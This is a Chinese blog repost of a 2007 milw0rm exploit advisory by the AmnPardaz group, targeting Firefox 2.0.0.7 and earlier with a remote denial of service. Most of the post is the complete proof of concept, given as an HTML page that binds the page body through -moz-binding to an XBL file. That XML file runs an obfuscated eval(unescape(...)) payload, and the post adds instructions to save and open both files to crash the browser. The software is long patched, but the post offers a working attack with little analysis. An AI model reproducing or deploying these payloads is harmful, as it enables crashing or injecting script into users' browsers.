首页 > 网络安全 > Mozilla Firefox <= 2.0.0.7 Remote Denial of Service Exploit

Mozilla Firefox <= 2.0.0.7 Remote Denial of Service Exploit

2007年10月23日 发表评论 阅读评论
<br />######################### WwW.BugReport.ir #########################<br />#<br /># AmnPardaz Security Research & Penetration Testing Group<br />#<br /># Bug Title: Mozilla Firefox 2.0.0.7 Denial of Service<br /># Vendor URL: www.mozilla.org<br /># Version: <= 2.0.0.7<br /># Fix Available: Yes!<br /># Soloution: Update to 2.0.0.8<br /># Note: This bug works on 2.0.0.8 in different way. Although this bug doesn&#039;t crash 2.0.0.8, it causes not showing html code by viewing source in Mozilla Firefox 2.0.0.8 and this is another bug on 2.0.0.8!<br /># Proof: http://www.astalavista.ir/proofs/MozillaFireFox/DoS1.htm<br />#<br />######################### WwW.AmnPardaz.com ########################<br />#<br /># Leaders : Shahin Ramezany & Sorush Dalili<br /># Team Members: Amir Hossein Khonakdar, Hamid Farhadi<br /># Security Site: WwW.BugReport.ir - WwW.AmnPardaz.Com<br /># Country: Iran<br /># Greetz To : Astalavista.ir (Secuiran.com) Security Research Group, GrayHatz.net<br /># Contacts: <th3_vampire {4-t&#93; yahoo &#91;d-0-t} com> & <Irsdl {4-t&#93; yahoo &#91;d-0-t} com><br />#<br />######################## Bug Description ###########################<br />#<br /># To do this work we need 2 files (Html,XML).<br /># Their codes was written below.<br />#<br /># Save below codes in a HTML file.<br />#<br />--------------------------------------------------------------------<br />--------------------------------------------------------------------<br /><html><br /><head><br /><style>BODY{-moz-binding:url("moz.xml#xss")}</style><br /></head><br /><body><br />Suddenly see you baby! If you see this bug execution was failed!<br /><script><br />alert(&#039;Soroush Dalili & Shahin Ramezani From Astalavista.ir&#039;)<br /></script><br /></body><br /></html><br />--------------------------------------------------------------------<br />--------------------------------------------------------------------<br />#<br /># Save below codes in "moz.xml" file.<br />#<br />--------------------------------------------------------------------<br />--------------------------------------------------------------------<br /><?xml version="1.0"?><br /><bindings xmlns="http://www.mozilla.org/xbl"><br /><binding id="xss"><br /><implementation><br /><constructor><!&#91;CDATA&#91;<br />eval(unescape(&#039;%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%61%3e%27%29&#039;)); <br />&#93;&#93;></constructor><br /></implementation><br /></binding><br /></bindings><br />--------------------------------------------------------------------<br />--------------------------------------------------------------------<br />#<br /># Now by runnig the HTML file by Mozilla FireFox <= 2.0.0.7 it will be crashed and by Mozilla FireFox 2.0.0.8 no code will be showed by viewing the source.<br />#<br />###################################################################<br /><br /># milw0rm.com

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:Mozilla Firefox <= 2.0.0.7 Remote Denial of Service Exploit
本文地址:http://www.woyigui.cn/2007/10/23/mozillafirefoxlt%3B%3D2007remotedenialofserviceexploit/

分类: 网络安全 标签: ,
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*